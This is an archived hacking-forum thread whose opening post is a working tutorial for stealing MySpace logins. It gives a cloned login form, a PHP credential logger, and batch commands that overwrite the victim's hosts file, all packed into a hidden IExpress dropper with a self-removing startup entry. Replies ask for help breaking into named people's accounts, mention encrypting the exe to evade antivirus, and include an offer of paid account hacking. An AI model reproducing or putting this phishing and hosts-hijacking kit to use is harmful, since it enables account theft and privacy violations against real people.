PDA

View Full Version : How To Get Myspace Passwords



teknicalissue
02-07-2008, 04:05 AM
This tutorial gives you the ABILITY to obtain myspace passwords..before i continue i must state that i have no intensions of using my knowledge to actually get myspace passwords AND this tutorial is for EDUCATIONAL PURPOSES ONLY!! meaning if you do it and get in trouble, don't blame it on me, im only posting this tut so myspace can get a fix on this problem..

now that i have my disclaimer up i will begin the tutorial.

a brief discription of this tutorial combines my and m00nbats ideas (yes moonbat, your host file thing is involved so props for that). this will require for the "Target" to click on an .exe and after that, everything will go the way you want it to be.

ok your going to need a few things.

*. a server (don't worry its not as scary as it sounds, i will "provide" one for you)
2. some batch file knowledge
*.some HTML knowledge

ok, to explain what we are going to do, we will basicly tell the computer that when you type in "myspace.com" it will take them to your phishing site of myspace.com VIA ip address thus the name "hijacking" comes to play. in order to do this we will have to replace their host file with your modified version. and to cover our *****s of us being in that computer, we will delete everything we have added/modified. now to begin

first off we need to have a phishing site for myspace, so lets go to myspace.com. right click the page (anywhere) and click view source. we should get a bunch of lovely html sooo assuming your in notepad (if not copy and paste the code to notepad) we go to edit then find and we type in the find box
<form action (dont forget the "<") it should take us to a nice little string
like so


<form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">


so now we edit the code so that everything that goes in the form, appears in our server (aka your computer)


<form action="login.php" method="get" id="LoginForm" name="aspnetForm">


after you edit this save it as index.html on to your desktop

you may be wondering what login.php is, well we have to create that. the php should just have this



<?php
header("Location: http://home*4.myspace.com/index.cfm?fuseaction=user");
$handle = fopen("out.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


all this does is it "retrieves" what ever things go in the html form you receive in a pretty out.txt and it also redirects them to the real site.

now that we have all of this set up, we begin to install our server. i personally use XAMPP just because i believe its pretty good and simple. you can get xampp HERE (http://www.apachefriends.org/en/xampp-windows.html) and download the installer. make sure you select the three services when you install xampp =)

once youve done that just install everything and head to your installation directory (default is C:\xampp) once there go to htdocs and open up your internet browser.

in the address bar type in localhost and it should take you to a xampp page. if it doesn't then theres something wrong with your installation, if it does then delete everything in the htdocs and place index.html and login.php in the folder.

now re***** your web browser and you should see the magical myspace page, now just type anything in the username and password field and you should end up in the REAL myspace page. check your htdocs foder and there should be an out.txt with what you have put inside those field, this means IT WORKS so lets proceed on editing the host file in "C:\WINDOWS\system*2\drivers\etc" (etc is in fact a folder)

we now copy and paste it on to your desktop. close etc and open up notepad and open up the host file with notepad by just dragging and dropping the host file on to notepad. we should get something like this



# Copyright (c) ****-**** Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# *02.54.*4.*7 rhino.acme.com # source server
# *8.25.6*.*0 x.acme.com # x client host

*27.0.0.* localhost


we will now add your ip and besides it, put myspace.com as many ways as possible so it would look like



# Copyright (c) ****-**** Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# *02.54.*4.*7 rhino.acme.com # source server
# *8.25.6*.*0 x.acme.com # x client host

*27.0.0.* localhost
*2.*4.56.7 myspace.com
*2.*4.56.7 www.myspace.com
*2.*4.56.7 http://myspace.com
*2.*4.56.7 http://www.myspace.com
*2.*4.56.7 myspace


*2.*4.56.7 is your ip so if your ip address was 24.*0.78.7* then youd replace *2.*4.56.7 with 24.*0.78.7*. if you don't know what your ip address is, then goto whatismyip.com and it should tell you in big black letters what your ip address is. now save and exit the host file and open up notepad again. we will now inject notepad in to the target system so we will add this to our batch file


@echo off
DEL C:\WINDOWS\system*2\drivers\etc\host
MOVE "host" "C:\WINDOWS\system*2\drivers\etc"
MOVE "stop.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"


save this as start.bat and make it into and exe using the bat to exe converter found HERE (http://www.all-nettools.com/forum/showthread.php?t=6*0*) at the end of the page.

we will now create the "stop.exe" which really is stop.bat converted into an exe file



@echo off
DEL C:\WINDOWS\system*2\drivers\etc\host
DEL C:\Documents and Settings\All Users\Start Menu\Programs\Startup\stop.exe

save it as stop.bat and convert it to exe.

now we should have
host
start.exe
stop.exe

now we go to start->run->iexpress

now create a new self extraction then click next
select extract and install (the first choice Buzzo) then next
give it a good looking tiltle then next
then no promt then next
no license..next
ah now we add our host, start.exe and stop.exe in to this wonderful white box and click next
on the box that says install program select start.exe then next, we don't need anything for the bottom
select hidden then next
no message, next
now check hide process animation from user and click browse to save it and give it a good name like above..next
no restart, next
don't save if you do then save i don't care, next
then create the file and now you should have the file finished..all you have to do is get your victim to open it, and everytime they go to myspace, it will show your servers page instead and when they type in anything in those username and password fields, it will go to your out.txt.

have fun!!!
keep in mind to always have your computer on or else your server wont work

REMEMBER THAT IF YOUR BEHIND A ROUTER, FORWARD PORT 80 TO YOUR COMPUTER!!!!!!!!!!!!!!!!!!!!!!!!

Moonbat
02-07-2008, 08:21 AM
/me is looking forward to see how this turns out

teknicalissue
02-07-2008, 05:11 PM
sorry for the wait guys, ill have it up by tonight, i havent been getting much sleep lately..

lol trying to revive an old ***5 compaq computer so bare with me

teknicalissue
02-08-2008, 04:25 AM
hope you all like it, if anything goes wrong, don't be afraid to post it up lol

Moonbat
02-08-2008, 07:56 AM
Maybe this is due to my lack of knowledge, but how come the first line in batch files are DEL commands? Why are you deleting the files?

teknicalissue
02-08-2008, 08:10 AM
on the stop.exe? or the start.exe
on the stop, its because we don't want them going to our site EVERYDAY, so when they restart their computer "*********ly" everything goes back to normal

on the start, its because when you delete the host file, windows basicly stops using it and then when i move it, it begins using it again. bbbutttt

i found out that if you just replace the file without deleting it, for some reason it still runs..so for example if i just simply replace it, and i would type in myspace.com it would take us to the REAL myspace page for awhile till the system randomly loads up the file (this is on my xp system..don't know about the others) but if i where to delete it and replace it, it would then give us the web site instantaniusly

Moonbat
02-08-2008, 05:20 PM
Ah, my bad. I forgot Windows restores certain files :p

teknicalissue
02-08-2008, 10:37 PM
tis cool:D

strumminglevi
02-08-2008, 11:00 PM
I made the index.html file and the login.php file on notepad. I have installed xampp and when I type in localhost I was taken to an xampp page where I clicked english. This is where I have a problem. I delete all of the files in httdocs and put index.html and login.php into the folder. When I re***** my browser I am taken to a page that says

"Object not found!

The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again.

If you think this is a server error, please contact the web******.
Error 404
localhost
02/08/08 **:56:56
Apache/2.2.6 (Win*2) DAV/2 mod_ssl/2.2.6 OpenSSL/0.*.8g mod_autoindex_color PHP/5.2.5"

teknicalissue
02-09-2008, 03:56 PM
why not contact me VIA AIM?
trying to fix something like this, is kinda hard in forums lol but anywho

make sure index.html and login.php is inside httdocs and not someother folder, also make sure that you named it index.html and not INDEX or Index, my computer has the same problem with capitalized letters, emm try restarting your computer also so you can reload the services from xampp.

strumminglevi
02-09-2008, 10:06 PM
I'm trying that right now. When I install xampp do I check all of the servers or just one?

nkb010
02-10-2008, 08:18 PM
Ummmm Can You Help Me Find The Password To My Myspace Account??please

teknicalissue
02-11-2008, 01:06 AM
any questions can be answered in my forum at cybernin.net =)

mman24023
04-12-2008, 05:42 PM
What do i do when im done with every thing and i have my iexpress file. just get someone to open it. can i test if it works. bc i opened it and i still go strait to myspace page

tdeath101
04-18-2008, 10:05 AM
im teknicalissue btw:
you can test it out by asking a friend to type in his ip address in his browser. if it shows a myspace page... it works, if it doesn't, then open your ports.

HouseMusicLover
06-04-2008, 09:50 PM
Honestly....I got lost right after the 2nd instruction where it said type in the code in " find " ... What exactly do i need to type?????
Can someone like guide me through this step by step? Its way too confusing...I would appreciate it alot. Thanks!

HouseMusicLover
06-05-2008, 12:54 PM
I already lost myself where you wrote in the font part in notepad, type "<form=action ... i dont get it...what exactly am i supposed to type??? im sooo lost in this can someone help ?????

i would appreciate it thank youuuu

lialoccani
06-10-2008, 07:08 AM
Evil Spam Is Evil :d

gordo
06-10-2008, 05:27 PM
For the hell of it, I clicked one of the links, which brought me to a porn site that tried to download a file setup.exe. After sending it to virustotal, and a google search.... http://www.virustotal.com/analisis/*0bbc*6*87*67564bb6de6fccb204***

Moonbat
06-10-2008, 06:10 PM
For the hell of it, I clicked one of the links, which brought me to a porn site that tried to download a file setup.exe. After sending it to virustotal, and a google search.... http://www.virustotal.com/analisis/*0bbc*6*87*67564bb6de6fccb204***
I must've missed this thread in my spamhunt, thanks for letting me know gordo. :)

EDIT: Some Googling gave me the name of the trojan, intresting read - http://en.wikipedia.org/wiki/Zlob_trojan

The Zlob Team of computer crackers automatically submit forum comments with the use of automated script program like Xrumer creating forum spam. If the links are clicked, the Zlob trojan will force itself into installation. These are often found in the form of medicine and pornography promoting but recently have included for streaming video's websites. The trojan can be hidden in literally anything.

Even more info about Xrumer, which I'm guessing these spammers are using - http://en.wikipedia.org/wiki/Xrumer

In addition, the software can avoid the suspicions of forum administrators by first registering to make a post in the form of a question which mentions the spam product ("Where can I get...?"), before registering another account to post a spam link which mentions the product.

I've seen that exact type of spam here.

faechanix
06-10-2008, 09:17 PM
Okay, please dont take me for a lazy moron, Im really trying to learn and have SOME experience...

But the problem Im having is when in notepad and going to find with "<form action" it finds nothing. Im sure I got the source file right, I copied and pasted it into notepad but its not finding anything.
Also, does the 'target' have to fall for this method using the same computer as I am?

nozf3r4tu
06-11-2008, 02:05 AM
Take your time,go thru the source code. We all been where you at,patience.

smokenashley1
06-19-2008, 05:17 PM
ok i need a myspace password for my smutty cuzin cuz she is supposebly pregnant by my bf of almost a year and i just want to see her myspace page

~~smart~fool~~
06-21-2008, 08:11 PM
The server part really isn't necessary. You can just direct the host file to your phish somewhere on the net. Nice job though. Too bad this got ruined by people that dont want to do any work [OmG phr** myspace passwords wher*]

Nice find moonbat. We need some url encrypting or some insane captchas to beat these guys.

M0DALsoul
09-03-2008, 12:28 AM
Is there any chance that a Video tutorial could be made? I've followed the instructions precisely again and again, but still I receive the same error message:

"Object not found!

The requested URL was not found on this server. The link on the referring page seems to be wrong or outdated. Please inform the author of that page about the error.

If you think this is a server error, please contact the web******.
Error 404
localhost
0*/02/08 2*:26:*5
Apache/2.2.* (Win*2) DAV/2 mod_ssl/2.2.* OpenSSL/0.*.8h mod_autoindex_color PHP/5.2.6 "


and this is after i've followed this instruction:
"in the address bar type in localhost and it should take you to a xampp page. if it doesn't then theres something wrong with your installation, if it does then delete everything in the httdocs and place index.html and login.php in the folder."

it does in fact take me to the xampp page, and i've deleted everything in the htdoc folder and put both the index.html and login.php files which I firmly believe i've created correctly. any ideas?? but yeah a video tutorial would really help!:confused:

contact me with any solutions: craigskingii@********** or AIM: DlittDisciple

moza1990
09-04-2008, 12:29 PM
i forgot my myspace password my url is www.myspace.com/melhadi
an my email is m-a-e-24@hotmail.com plz i need help to get back my acount

hockeydude14
01-28-2009, 06:04 PM
ok sorry im a rookie i usually dont do this kinda stuff, but i got to the part where you open up the xampp file use the web browser and then type in local host and your supposed to go to xampp's homepage. i know you said that i installed it wrong but idk what i did wrong i followed your instructions explicitly

dee dee
02-20-2009, 02:43 PM
Hi i read that you could get myspace passwords and i really need one in particular i could use some help i could give you his email address and hopefully you could get it for me or teach me how to get it myself his email address is brave_rider@********** thank you and please i would really appreciate it:)

simrnz
03-09-2009, 10:45 AM
i forgot my myspace password my url is www.myspace.com/melhadi
an my email is m-a-e-24@hotmail.com plz i need help to get back my acount

hello moaz i think i can help you out if you can just wait for a few days, i mean 2-* days, right now I'm leaving out of station and i ll be back within a day or two. but i've bookmarked this thread and will definitely come back to you :)
till then, you can try this: http://collect.myspace.com/index.cfm?fuseaction=user.retrievepassword
if you remember your email ID; but if you forgot ur email too then you've to wait i ll give you some more info when be right back

dcast352
06-09-2009, 10:30 PM
but when i go to c:\xampp i do not hav httdocs but i do have htdocs :confused: i opened that and i opened my browser and typed in localhost and it said page not found i am confused any* that can help please send me an email countryboy*5284*@********** thanls alot


, Dougie

dcast352
06-09-2009, 10:35 PM
i have the same prob. can some* help me countryboy*5284*@********** :eek:


ok sorry im a rookie i usually dont do this kinda stuff, but i got to the part where you open up the xampp file use the web browser and then type in local host and your supposed to go to xampp's homepage. i know you said that i installed it wrong but idk what i did wrong i followed your instructions explicitly

teknicalissue
06-18-2009, 11:55 PM
Updated a few the httdocs thing it wasn't two t's it was one so its htdocs not httdocs

michaelbsuccc
06-29-2009, 04:26 AM
hi can you help. the start.exe file isnt working for me. i got the start.bat and converted it to start.exe. it just comes up saying trojan is detected.

pls help

mikej3131
07-13-2009, 12:38 AM
Hello i got up to the point where it says "now just type anything in the username and password field and you should end up in the REAL myspace page. "

Ok well i did this and it takes me to a page with just the contents of the .php file that i created. Can you help me out and tell me what im doing wrong?

mzlewinsky336
07-22-2009, 10:47 AM
i need to find out if my boyfriend is cheatinq
on me can you please help me !!!

gordo
07-22-2009, 08:17 PM
i need to find out if my boyfriend is cheatinq
on me can you please help me !!!
Wear a disguise, like a hat and fake beard, and follow him.

mz.leaya
07-26-2009, 04:26 PM
i need my myspace password for my account

agunawanika
08-06-2009, 12:09 PM
great tutorial pos..make me confuse....but, I've to learn hard...thanks..:)

Nando
08-21-2009, 11:10 PM
Waw.... It's very useful, thank you very much...

Nando
08-21-2009, 11:12 PM
You're the best

Nando
08-27-2009, 12:31 PM
Okay, i'm have a question. What can we used desktop phishing in a web hosting?

teknicalissue
09-25-2009, 10:17 AM
im glad everyone is liking the tut, some anti viruses are getting pretty smart but you can usually get around them by encrypting the .exe ( maybe will post a tut later on)

VirusFlyTrap
10-05-2009, 03:59 AM
Is there a smaller (in MB) program alterative to xampp?:confused: i have a size limit of around *-4 mb per file or the internet shuts down.:(
----------------------------------------------------------------------------
p.s NEVER GET TELSTRA CLEAR NZ BROADBAND!!! *gb usage limits suck.:mad:
----------------------------------------------------------------------------

Moonbat
10-09-2009, 12:51 PM
Is there a smaller (in MB) program alterative to xampp?:confused: i have a size limit of around *-4 mb per file or the internet shuts down.:(
----------------------------------------------------------------------------
p.s NEVER GET TELSTRA CLEAR NZ BROADBAND!!! *gb usage limits suck.:mad:
----------------------------------------------------------------------------
Sorry, but the PHP language needed is around **MB in size by itself, not including the server you'll need to run it. I doubt you'll be able to find anything in the size range you are asking for.

Try to download the XAMPP installer at another computer, and use a USB drive and bring it back to your home computer.

frosty024
10-14-2009, 10:39 PM
Love the tutorial! Got it up and running flawlessly! Any chance you have a version that works on Facebook?? I would like to get it running on the same server I have the Myspace one running on... Preferably using the same methods...

cerberix
10-15-2009, 05:37 AM
Educational means its for positive approach. Guns are bought for protection but goons use it for illegal activities. So the manuf cannnot be blamed. Depends how it is used (in a positive manner)

glenfoxman
11-09-2009, 08:34 PM
Im pretty sure theres a few programs out there that will scrub the drive clean. Well there always a way to get the data back if you spend enough *****. If your really paranoid, do what that guy did in prison break. Magnetize the hard drive and throw it in a river.
_______________________________________
Website I designed for cash advance Winnipeg (http://www.paydaytown.com) company.

bruinee09
11-22-2009, 05:58 AM
my renders always look a bit blurry,and they come out small.how do i get them bigger and sharper thanks

bustamove2012
12-02-2009, 11:18 PM
Thank you for this thread!!! I have finished all the steps and I used the iexplorer file but nothing happened. I went to myspace after using it and it was the actual myspace page. None of the passwords or anything was saved. Can it be because of my virus software? Is there a way to hide the files from a virus scanner?

RAMS678
01-01-2010, 11:02 PM
I am an experienced hacker offering my services to the public. Payment works in this way, first you pay me $20 up front and than after I have hacked the account which usually takes around *0-45 minutes I will provide you with the password.

After you have tested out the password to make sure everything works ok and good than you get me the other $20.

At the moment I am only accepting ******* ***** and Cash in the mail as forms of payment. I can get various other types of account passwords, especially for website type accounts and E-mails.

I have many references of people who I have done past work with in terms of hacking accounts or specific projects whose E-mails I can give you to talk with them to show I am the real deal.
_________________________________________________
debt consolidation (http://debtdeal.com)
lifetime mortgage (http://www.equity-release-lifetime-mortgage-schemes.co.uk/equity-release-schemes/lifetime-mortgage.html)